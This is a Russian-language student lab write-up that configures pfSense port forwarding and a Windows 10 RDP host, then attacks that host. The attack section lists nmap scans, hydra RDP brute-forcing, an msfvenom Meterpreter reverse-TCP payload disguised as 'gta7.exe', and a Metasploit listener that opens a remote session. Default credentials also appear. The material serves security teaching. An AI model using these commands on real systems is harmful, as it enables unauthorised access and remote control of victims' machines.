# Практическая работа №1. Настройка pfSense и проведение атаки на RDP
###### tags: Надежность СЗИ
## 1. Подготовка

!s[](https://i.imgur.com/u8ZSTWg.png)
> Схема сети
### Настройка pfSense
На FW необходимо настроить 2 интерфейса - wan (em0) и lan (em1). Для этого после запуска FW переходим в консоль, в панели выбора нажимаем "1. Assign Interfaces" и определяем, какой интерфейс смотрит в интернет, а какой в локальную сеть (название интерфейса emN взято для примера, оно может отличаться). Затем необходимо настроить ip-адреса интерфейсов:
Set interface(s) IP address -> number of the Int (1) -> DHCP? (yes) -> IPv6 DHCP? (no) -> new WAN IPv6 adress? (enter) -> http? (no, https)
Set interface(s) IP address -> number of the Int (2) -> enter the new ip address (172.16.1.254) -> subnet (24) -> gateway (no) -> IPv6? (no) -> DHCP? (yes) -> 172.16.1.100 - 172.16.3.110 -> http (no, https)
Затем необходимо зайти на Win7/10 и с нее донастроить pfSense через GUI. В браузере Win7/10 набираем адрес lan-интерфейса FW, заходм по кредам admin/pfsense. Затем необходимо настроить две вещи: проброс портов для будущего подключения по RDP и разрешение на маршрутизацию приватных сетей на WAN-интерфейсе (также можно добавить статический ip-addr на Win7/10, чтобы подключения были стабильными).
Для начала меняем дефолтный пароль (чтобы pfSense не ругался) и отключаем запрет на приватные сети: Interfaces -> WAN. Затем в пункте "Reserved Networks" убрать обе галочки и сохранить изменения.


Затем перейти в Firewall -> NAT -> Port Forward и настроить проброс порта с wan-интерфейса на ip-addr Win7/10.

Для закрепления определенного ip-addr за Win7/10 необходимо перейти в Services -> DHCP Server -> LAN, в самом низу будет пункт "DHCP Static Mapping...", в нем необходимо добавить mac-addr устройства и присуждаемый ему ip-addr и сохранить настройки.
### Настройки Win10
На данной машине необходимо включить RDP-server, для этого выберите Пуск > Параметры > Система > Удаленный рабочий стол, и выберите Включить удаленный рабочий стол. После этого нужно проверить работу RDP (дефолтные креды User/eve@123) с Win7 (из локалки) и с основного хоста (из "глобалки").
## 2. Создание reverse shell
### Сканирование сети и портов

> nmap -sP 192.168.XXX.0/24
> nmap -sT -p1-10000 192.168.XXX.XXX
### Brute-force кредов от RDP

> hydra -L users.txt -P pass.txt rdp://192.168.206.156
### Создание payload для reverse_tcp

> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.147 lport=5555 -f exe > gta7.exe
### Передача зараженного файла на Windows 10

> xfreerdp 192.168.206.156
> scp user@192.168.206.147:/home/user/hydra/gta7.exe
### Активация прослушивания порта на kali

> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.206.147
> set lport 5555
> exploit
### Открытие reverse_tcp-сессии после запуска файла на Windows 10


> screenshare